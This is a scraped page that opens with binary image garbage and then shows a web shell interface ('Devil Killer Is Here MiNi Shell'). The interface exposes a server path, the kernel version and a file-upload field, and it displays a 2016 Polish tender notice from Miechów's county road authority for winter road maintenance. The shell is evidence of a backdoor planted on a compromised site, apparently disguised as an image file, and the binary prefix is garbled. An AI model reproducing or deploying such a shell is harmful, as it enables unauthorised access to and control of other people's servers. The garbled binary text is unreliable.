JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160930/315912-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 315912 - 2016
              z dnia 2016-09-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Miechów: Zimowe utrzymanie dróg powiatowych administrowanych przez ZDP w Miechowie w sezonie
zimowym 2016 - 2017
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych, krajowy numer identyfikacyjny
              29994322100000, ul.
              ul. Warszawska 
              11,
              32200  
              Miechów, woj.
              małopolskie, państwo
              , tel.
              413 830 742, e-mail
              przetargimiechow@onet.eu, faks
              413 831 832.
              <br />
              Adres strony internetowej (URL): www.zdp.miechow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zdp.miechow.pl/przetargi.htm</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zdp.miechow.pl/przetargi.htm</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty musza być złożone w formie pisemnej.<br />
                Adres:
                <br />Zarząd Dróg Powiatowych w Miechowie ul. Warszawska 11, 32-200 Miechów, sekretariat- pok.nr2</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zimowe utrzymanie dróg powiatowych administrowanych przez ZDP w Miechowie w sezonie
zimowym 2016 - 2017
<br /><b>Numer referencyjny: </b>SE.261.6.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zimowe utrzymanie dróg powiatowych administrowanych przez ZDP w Miechowie w 
sezonie zimowym 2016  2017 
z podziałem na zadania:
USŁUGI  DYSPONOWANE PRZEZ OBWÓD DROGOWY W MIECHOWIE
Zakres działania obejmuje sieć dróg powiatowych Powiatu miechowskiego objętych zimowym utrzymaniem, wg standardów zatwierdzonych w operacie Zimowego Utrzymania Dróg w sezonie 2016/2017.
  
1. usługi zimowego utrzymania dróg świadczone pługo-piaskarką, zestaw Nr1  -  1szt.
  [piaskarka Schmidt  nr inw.743/726/b i pług nr inw. 582-2-510,  własność ZDP, nośnik- samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne, własność wykonawcy]
      Przewidywany zakres: 10 800km

2. usługi zimowego utrzymania dróg świadczone pługo-piaskarką,  zestaw Nr2  -  1szt.
  [piaskarka typ PP-1 nr inw.582-3/503 i pług nr inw. 582-2-519,  własność ZDP, nośnik- samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne, własność wykonawcy]
      Przewidywany zakres: 10 800km

3. usługi zimowego utrzymania dróg świadczone pługo-piaskarką,  zestaw Nr3  -  1szt.
  [piaskarka typ PP-1 nr inw.582-3/505 i pług nr inw. 9150-002, własność ZDP, nośnik- samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne, własność wykonawcy]
      Przewidywany zakres: 10 800km
4. usługi zimowego utrzymania dróg świadczone pługo-piaskarką, zestaw Nr4  -  1szt.
  [piaskarka Schmidt  nr inw.582-3/506 i pług nr inw. 582-2-511,   własność ZDP, nośnik- samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne, własność wykonawcy]
      Przewidywany zakres: 10 800km

5. usługi zimowego utrzymania dróg świadczone pługo-piaskarką,  zestaw Nr5  -  1szt.
  [piaskarka Schmidt  nr inw. 582-3/504 i pług nr inw. 9150-011,  własność ZDP, nośnik- samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne własność wykonawcy]
      Przewidywany zakres: 10 800km

6. usługi dotyczące zimowego utrzymania dróg wykonywane koparko-ładowarką (załadunek materiałów) o poj. łyżki co najmniej 0,25m3 lub więcej (sprzęt wykonawcy) - 1szt
   Przewidywany zakres: 300godz.

7.transport materiałów do zimowego utrzymania dróg ze składowiska w Chrustach 
   k.Książa Wielkiego do Miechowa 
  Przewidywany zakres: 17km x 6500T= 110500 Tkm

8.  zimowe utrzymanie odcinków chodników przy ulicach i drogach powiatowych w Miechowie
     na pow. 12 199m2 oraz w ciągu dr. powiatowej 1206K Jaksice do dr.kraj nr7 w m. Jaksice
     na pow.371m2    materiał do posypywania Zamawiającego.  
     Przewidywany zakres: 50dni (dzień=doba 24godz.)

9. zimowe utrzymanie wiaduktu wraz z chodnikami i dojazdami w ciągu dr. powiatowej
     1194K Gr. woj.- Kozłów  Książ Wielki  m. Kozłów 
     - materiał do posypywania Zamawiającego.          
     Przewidywany zakres: 30dni (dzień=doba 24godz.)

10. zimowe utrzymanie odcinków chodników w ciągu dr. powiatowej 1194K Gr. woj.- Kozłów 
     - Książ W m. Kozłów na pow.1356m2,  w ciągu dr. powiatowej 1198K Mierzawa  
     Sędziszów  Kozłów m. Kozłów na pow.94m2, w ciągu dr. powiatowej 1183K Kozłów-  
     Przybysławice  Łazy m. Kozłów na pow.193m2 i w ciągu dr. powiatowej 1180K Kozłów  
     Kępie  Charsznica m. Kępie na pow. 576m2  - materiał do posypywania Zamawiającego.         
     Przewidywany zakres: 50dni (dzień=doba 24godz.)

11. zimowe utrzymanie odcinków chodników w ciągu dr. powiatowej 1172K Maków  Gołcza   
Zerwana w m. Gołcza na pow. 2882m2, w ciągu drogi powiatowej 1204K Miechów (ul.Kolejowa)-Rzeżuśnia-Gołcza w m. Gołcza na pow. 447m2, w ciągu dr. powiatowej 1172K Maków  Gołcza Zerwana  w m. Wysocice na pow. 1059m2 i w ciągu dr. powiatowej 1174K Szreniawa  Przybysławice w m. Szreniawa na pow.1008m2 
- materiał do posypywania  Zamawiającego.  
     Przewidywany zakres: 50dni (dzień=doba 24godz.)

12. zimowe utrzymanie chodnika w ciągu dr. powiatowej 1224K Bukowska Wola  
      Działoszyce   m. Słaboszów na pow. 1540m2, w ciągu dr. powiatowej 1194K gr.woj.-
      Książ Wlk.-Słaboszów w m. Słaboszów na pow.495m2 i  w ciągu dr. powiatowej  
     1214K Małoszów  - Janowice w m. Janowice na pow. 289m2 
        materiał do posypywania  Zamawiającego.  
     Przewidywany zakres: 50dni (dzień=doba 24godz.)

13. zimowe utrzymanie chodnika w ciągu dr. powiatowej 1235K Racławice  Wrocimowice
     m. Racławice na pow. 1500m2 i w ciągu dr. powiatowej 1233K Kropidło-Racławice
      m. Racławice na pow. 630m2
     - materiał do posypywania Zamawiającego.  
     Przewidywany zakres: 50dni (dzień=doba 24godz.)

14.  zimowe utrzymanie chodnika w ciągu dr. powiatowej  1194K Gr.  woj.  Kozłów  Książ   
       Wielki   Słaboszów m. Książ Wielki na  pow.1564m2  i w ciągu dr.1219K Książ
        Wlk.   Zaryszyn w m. Książ Wielki na pow. 415m2 i w m. Książ Mały na pow.884m2
       - materiał do posypywania Zamawiającego.  
     Przewidywany zakres: 50dni (dzień=doba 24godz.)
                                     
15. zimowe utrzymanie chodnika w ciągu dr. powiatowej 1137K Boża Wola  Jeżówka  
     Tczyca m. Tczyca na pow. 715m2 i w ciągu dr. powiatowej 1177K Tczyca  Jeżówka  
     Tczyca m. Tczyca na pow. 248m2 i w ciągu dr. powiatowej 1186K Jelcza  Podmiejska  
     Wola m.Jelcza na pow.738m2
     - materiał do posypywania Zamawiającego.  
     Przewidywany zakres: 50dni (dzień=doba 24godz.)

16. zimowe utrzymanie chodnika w ciągu dr. powiatowej 1186K Jelcza  Podmiejska  
     Wola m. Charsznica na pow. 6333m2 i w ciągu dr. powiatowej 1175K Charsznica do dr.
     783 m. Charsznica na pow. 2022m2
     - materiał do posypywania Zamawiającego.  
     Przewidywany zakres: 50dni (dzień=doba 24godz.)
<br /><br /><b>II.5) Główny kod CPV: </b>90630000-2<br /><b> Dodatkowe kody CPV:</b>90620000-9,
                60100000-9,
                98300000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 20/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 9.3.  Zamawiający w tym zakresie nie stawia żadnych wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 9.3.  Zamawiający w tym zakresie nie stawia żadnych wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a) wykaz wykonanych usług
Na potwierdzenie niniejszego warunku należy złożyć 
wykaz wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem  dowodów*, czy zostały wykonane lub są wykonywane należycie.

*Dowodem o którym mowa powyżej są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były lub są wykonywane. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów, jako dowód traktowane będą inne dokumenty w tym oświadczenie Wykonawcy.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów.

Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał:
Dla zadań 1-5   Wykonawca potwierdzi spełnianie warunku udziału w postępowaniu, dla zadań 1-5  jeżeli wykaże, że wykonał  co najmniej jedną usługę związaną z pracą pługo-piaskarką  przy zimowym utrzymaniu nawierzchni dróg publicznych, w sezonie zimowym o wartości brutto min. 30 000 tys. zł oraz załączy dowody określające czy roboty te zostały wykonane w sposób należyty.

Uwaga:  Wymieniony warunek będzie spełniony zarówno wtedy gdy Wykonawca składa ofertę na jedno zadanie  jak również na więcej niż jedno  zadanie, dla zad.1-5.

Dla zadania 6   Wykonawca potwierdzi spełnianie warunku udziału w postępowaniu jeżeli wykaże, że wykonał  co najmniej jedną usługę związaną z pracą koparko-ładowarką  przy zimowym utrzymaniu dróg lub załadunku materiałów sypkich  o wartości brutto min. 10 000 tys. zł oraz załączy dowody określające czy roboty te zostały wykonane w sposób należyty.

Dla zadania 7   Wykonawca potwierdzi spełnianie warunku udziału w postępowaniu jeżeli wykaże, że wykonał  co najmniej jedną usługę  transportową  o wartości brutto min. 20 000 tys. zł oraz załączy dowody określające czy roboty te zostały wykonane w sposób należyty.

Dla zadań 8-16   Wykonawca potwierdzi spełnianie warunku udziału w postępowaniu, dla zadań 9-17  jeżeli wykaże, że wykonał  co najmniej jedną usługę związaną z pracą przy zimowym utrzymaniu nawierzchni chodników,  placów, obiektów inżynierskich  w sezonie zimowym o wartości brutto min. 4 000 tys. zł oraz załączy dowody określające czy roboty te zostały wykonane w sposób należyty.
Uwaga:  Wymieniony warunek będzie spełniony zarówno wtedy gdy Wykonawca składa ofertę na jedno zadanie  jak również na więcej niż jedno  zadanie, dla zad.8-16.
b)    wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami

Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje n/w sprzętem:

Dla zad.1: samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne  min.1 szt.
Dla zad.2: samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne  min.1 szt.
Dla zad.3: samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne  min.1 szt.
Dla zad.4: samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne  min.1 szt.
Dla zad.5: samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne  min.1 szt.
Dla zad.6: koparko-ładowarka o poj.łyżki 0,25m3 lub więcej   		      min. 1 szt.
Dla zad.7: samochód samowyładowawczy o ładowności min 24tony    	      min. 1 szt.
             Dla zadań od 8 do 16 nie jest wymagany wykaz sprzętu.

Uwaga:  Wykonawca składając  ofertę na  więcej niż jedno  zadanie musi udowodnić  że  dysponuje minimum jedna jednostką sprzętową dla każdego zadania którego dotyczy oferta.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy, wykonawca złoży oświadczenie o braku podstaw wykluczenia oraz przedłoży na potwierdzenie następujące dokumenty;
a)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt.1 ustawy;
9.4.5	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa powyżej w pkt. 9.4.4, składa odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	Dokumenty, o których mowa powyżej w pkt. a) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce
zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. a), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis pkt b) stosuje się odpowiednio.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a) wykaz wykonanych usług
Na potwierdzenie niniejszego warunku należy złożyć 
wykaz wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem  dowodów*, czy zostały wykonane lub są wykonywane należycie.

*Dowodem o którym mowa powyżej są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były lub są wykonywane. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów, jako dowód traktowane będą inne dokumenty w tym oświadczenie Wykonawcy.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów.

Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał:
Dla zadań 1-5   Wykonawca potwierdzi spełnianie warunku udziału w postępowaniu, dla zadań 1-5  jeżeli wykaże, że wykonał  co najmniej jedną usługę związaną z pracą pługo-piaskarką  przy zimowym utrzymaniu nawierzchni dróg publicznych, w sezonie zimowym o wartości brutto min. 30 000 tys. zł oraz załączy dowody określające czy roboty te zostały wykonane w sposób należyty.

Uwaga:  Wymieniony warunek będzie spełniony zarówno wtedy gdy Wykonawca składa ofertę na jedno zadanie  jak również na więcej niż jedno  zadanie, dla zad.1-5.

Dla zadania 6   Wykonawca potwierdzi spełnianie warunku udziału w postępowaniu jeżeli wykaże, że wykonał  co najmniej jedną usługę związaną z pracą koparko-ładowarką  przy zimowym utrzymaniu dróg lub załadunku materiałów sypkich  o wartości brutto min. 10 000 tys. zł oraz załączy dowody określające czy roboty te zostały wykonane w sposób należyty.

